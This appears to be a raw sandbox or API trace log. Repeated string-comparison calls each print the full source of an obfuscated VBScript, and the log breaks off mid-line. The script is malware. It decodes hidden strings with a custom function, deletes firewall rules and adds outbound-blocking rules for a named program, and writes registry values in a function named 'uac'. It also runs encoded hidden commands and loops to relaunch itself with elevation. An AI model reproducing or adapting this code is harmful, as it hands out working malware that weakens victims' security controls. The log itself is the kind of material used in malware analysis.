bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 59 [0226.285] wcsncmp (_String1="AVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 52 [0226.286] wcsncmp (_String1="VE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 73 [0226.286] wcsncmp (_String1="E7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 56 [0226.286] wcsncmp (_String1="7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite 